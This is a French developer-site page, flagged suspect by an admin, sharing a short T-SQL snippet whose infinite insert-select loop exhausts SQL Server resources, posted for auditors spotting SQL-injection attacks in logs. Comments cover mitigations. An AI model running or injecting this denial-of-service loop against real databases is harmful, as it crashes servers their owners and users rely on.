CodeS-SourceS est hébergé par Frontier.fr

Ce site au démarrage

Accueil Codes Tutoriels Forums Emploi Livres Connexion

begin process at 2008 09 07 11:40:35

ENTITY FRAMEWORK : PROVIDERS ORACLE, MYSQL ET POSTGRESQL par Matthieu MEZIL

[WPF] NOUVEL ARTICLE SUR C2I.FR par richardc

F# NOUVELLE CTP 1.9.6.2 (UPDATE) par pierrick

LA SUITE ...PROPOSITION DE COLLABORATION RéDACTIONNELLE ENTRE LES COMMUNAUTéS DE DéVELOPPEURS ET MICROSOFT FRANCE par malabar

[FUN] VOTRE SIMULATEUR DE VOL AVEC MICROSOFT ESP par neodante

RE : [DEBUTANT] BESOIN D'AIDE SUR UNE REQUêTE MYSQL par casy

RE : BOUTON ENREGISTRER par nicomilville

[DEBUTANT] BESOIN D'AIDE SUR UNE REQUêTE MYSQL par nerone21

RE : REQUETE QUI NE RENVOIE PAS CE QUE JE VEUX par raph37

REQUETE QUI NE RENVOIE PAS CE QUE JE VEUX par raph37

+ de logiciels à télécharger

Indesit BAN 14 Congélateur en bas Réfrigérateur au meilleur prix

1 238 108 membres
79 nouveaux aujourd'hui
14 315 membres club

Trouver une ressource

Trouvez une ressource parmi 38 620 codes, 1 171 087 messages d'aide etc...

Recherche: dans [ Dernières recherches ]

Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum. Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

SQL SERVER - DOS DU SERVEUR

Information sur la source

Attention: ce code a été marqué comme suspect par un admin, il peut donc être dangereux.
Ce code a été laissé sur le site dans un but pédagogique, ne l'exécutez pas si vous ne comprenez pas son contenu!

Catégorie :Trucs & Astuces Classé sous : sqlserver, dos Niveau : Débutant Date de création : 06/10/2004 Date de mise à jour : 12/10/2004 09:32:09 Vu : 3 824

Auteur : white_mage

Ecrire un message privé

Note :
Aucune note

Commentaire sur cette source (4)

Ajouter un commentaire et/ou une note

Description

Attention. Ce code n'est pas vraiment une astuce. Il utlilise toutes les ressources du server SQL, le ralentit jusqu'au plantage (si le serveur est peut puissant). IL NE FAUT DONC PAS LANCER CE CODE (sauf pour le tester si ça vous plait)
Il est la à but informatif. Pourquoi ? tout simplement pour les audits. Si vous trouvez ce genre de code dans les log(victime d'SQL injection)
vous saurez qu'il faut vite patcher ça.

Sinon, juste pour l'idée de l'insert Select en boucle, je trouvais ça rigolo.

Aucune utilité (sauf l'audit et la connaissance)

Source

create table #myTmpTable
(champ1 varchar)
exec('insert into #myTmpTable select ''X''')
while 1=1 exec('insert into #myTmpTable select * from #myTmpTable')

create table #myTmpTable
    (champ1 varchar) 
exec('insert into #myTmpTable select ''X''')
while 1=1 exec('insert into #myTmpTable select * from #myTmpTable')

Historique

12 octobre 2004 09:32:09 :: Petite modif

Sources du même auteur

SQL SERVER - RECHERCHE DANS FICHIER GRACE À INDEXING SERVER

SQL SERVER - LE FORMIDABLE OPENROWSET

SQL SERVER - RÉCUPÈRER LA/LES RELATION(S) ENTRE 2 TABLES

SQL SERVER - CCASE DANS LA REQUÊTE

SQL SERVER - RÉCUPÈRER TOUTES LES TABLES + TOUS LES CHAMPS G...

Toutes les sources de white_mage

Sources de la même categorie

TROUVER LES PROCHAINS ANNIVERSAIRES par zefo

REQUÊTE SQL POUR DÉTERMINER L'ESPACE OCCUPÉ DANS LES TABLESP... par sgoriaud

SQL SERVER - OBTENIR LES VALEURS CORRESPONDANT A DES UNICODE par fabrice69

AJOUT , SUPPRESSION INTERVALLE DE TEMPS EN PLSQL par lamjed

REQUETE SUPPRESSION DE DOUBLON SOUS ORACLE par lamjed

Toutes les sources de la catégorie Trucs & Astuces

Sources en rapport avec celle ci

SQL SERVER 2000 - VIDER ET COMPACTER TOUTES LES BASES DE DON... par fabrice69

SQL SERVER - PROCEDURE D'EDITION D'UN FICHIER PLAT (EXPORT C... par FENETRES

MASTERMIND SUR SQL SERVER par dominique.stock

SQL SERVER 2005 : HISTORISER LES PROCÉDURES STOCKÉES D'UNE B... par skweeky

SQL SERVER 2005 : RECHERCHE DE CHAMPS PAR LEURS NOMS MULTI B... par skweeky

Commentaires et avis

Commentaire de fabrice69 le 07/10/2004 10:50:10 administrateur CS

En même temps que de fournir la facon de planter le serveur , il serait bon de donner au moins un lien expliquant la méthode pour sécuriser et éviter ce DOS.

Ta source pour le moment peut être considérer comme dangereuse sans cet ajout, et dans ce cas peut être ammené à être désactivée.

Romelard Fabrice.

Commentaire de white_mage le 07/10/2004 13:33:18

La meilleures methode pour ne pas risquer quelque chose est de ne pas avoir de faille de SQL injection. Si on prend le temps de verifier tous son code on peut éviter cela.

Une autre technique, est d'utiliser un utilisateur qui n'a pas le droit de création d'une table (ou qui n'a pas le droit d'insert). Cette methode est vraiment discutable car en effet, la requête ci-dessus ne fonctionnera pas, mais si un utilisateur peut injecter du code SQL, il peut de toute façon corrompre le serveur.

Les faille de SQL injection sont très très très grâve sur un site ou une application.

Un audit intensif des logs + du code + la création d'un utilisateur avec les droits minimums permettent déjà d'empêcher un massacre.

Alors à vos sources ;-)

Commentaire de white_mage le 07/10/2004 13:36:34

Si vous pensez que cette source peut nuire, n'heistez surtout pas à l'enlever.
En effet, j'ai longement réfléchi avant de mettre ce bout de source. Pour finir, j'ai décider de la mettre mais je ne sais toujours pas si c'est très utile.
J'espèrais surtout générer une prisede conscience de la part des developpeurs.

Commentaire de FENETRES le 26/11/2007 09:10:23

Sans aucun intérêt !

Ajouter un commentaire

Discussions en rapport avec ce code source dans le forum

Commande DOS pour SQLServer 7 [ par MokhTelnet ] y a t'il une commande dos pour SQLSERVER 7 ?(comme la commande sqlplus pour oracle) création automatique d'une base de données SQLServer [ par MokhTelnet ] bonjour j'ai besoin de savoir comment on peut créer une base de données SQLServer lors de l'installation d'une application. mon client ne veux se char Problème SQLSERVER/php [ par LeJulius ] Je travaille actuellement sous SQL SERVER 2000 en lien avec du PHP 4.2.0 Mon problème est le suivant :Mes tables sql contiennent des caractères accent Sauvegarde automatique sqlserver 2000 [ par jojos89 ] Salut a tous,J'ai une base de données en local sur mon pc (avec sqlserver 2000)que je voudrais sauvegardé automatique (tous les soir) s aide pour SQLSERVER [ par nagrom_om ] salut,quelqu'un sait il comment peut on avoir un listing des requetes qui sont passées sous SQL Server ??Merci ! ms access - sqlserver - procédurestockée [ par metasky ] bonjour,je suis actuellement sur une appli liant access et sqlserver...quand je consulte mes procédures stockées dans mon projet access les Quel outil pour SqlServer [ par padurand ] Mon site tourne avec une base de donnees Access, et des pages ASP.Je voudrais remplacer Access par SqlServer ... a priori il ne devrait pas y avoir de exporter des donnees de sqlserver 2005 vers access (dts) [ par tenrod ] Salut a tous ,Voila je travail avec une base sql server 2005 et je voudrais exporter le résultat d'une requete (a partir de ma base sql server) d SQLServer remplacer Null par 0 [ par BasicInstinct ] Bonjour tout le mondej'ai une requete plutot complexe qui calcule differents totaux selon des dates.lorsque pour un mois donné, je n'ai pas de va SqlServer [ par valentin013 ] Bonjour à tous, comment on peux limiter le nombre de lignes d'une requette(Top)valentin